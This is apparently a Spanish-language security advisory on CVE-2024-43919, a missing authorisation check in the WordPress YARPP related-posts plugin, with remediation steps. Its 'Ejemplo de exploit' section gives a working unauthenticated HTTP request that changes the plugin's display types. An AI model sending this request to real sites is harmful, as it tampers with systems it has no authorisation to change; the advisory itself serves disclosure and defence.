CVE-2024-43919: Falta de autorización en el plugin YARPP (<= 5.30.10)

El plugin YARPP (Yet Another Related Posts Plugin) para WordPress es ampliamente utilizado para generar listas de publicaciones relacionadas. Con más de 26.000 sitios web potencialmente expuestos, la vulnerabilidad representa un riesgo significativo debido a la popularidad del plugin.

Productoyet-another-related-posts-plugin
Fecha2024-12-30 12:00:56
Información
  • Tendencia
  • Corrección disponible

Resumen técnico

El plugin YARPP, hasta la versión 5.30.10 incluida, sufre de la falta de un control de capacidades en el archivo yarpp_pro_set_display_types.php. Esta vulnerabilidad permite a atacantes no autenticados manipular los tipos de visualización (display types) enviando solicitudes HTTP especialmente diseñadas.

Ejemplo de exploit

Un atacante puede aprovechar esta vulnerabilidad utilizando la siguiente solicitud HTTP:

GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: vulnerable-website.com
  • El parámetro ypsdt=false permite omitir un control inicial.
  • El parámetro types[] permite a los atacantes establecer tipos de visualización no autorizados.

Recomendaciones

  1. Actualizar el plugin: Actualice a la versión más reciente del plugin YARPP, ya que el proveedor ha solucionado el problema en versiones posteriores.
  2. Limitar el acceso: Utilice controles de acceso a nivel de servidor para limitar el acceso al archivo includes/yarpp_pro_set_display_types.php.
  3. Aplicar una regla WAF: Implemente un Web Application Firewall (WAF) para bloquear las solicitudes sospechosas dirigidas a este endpoint.

[Callforaction-THREAT-Footer]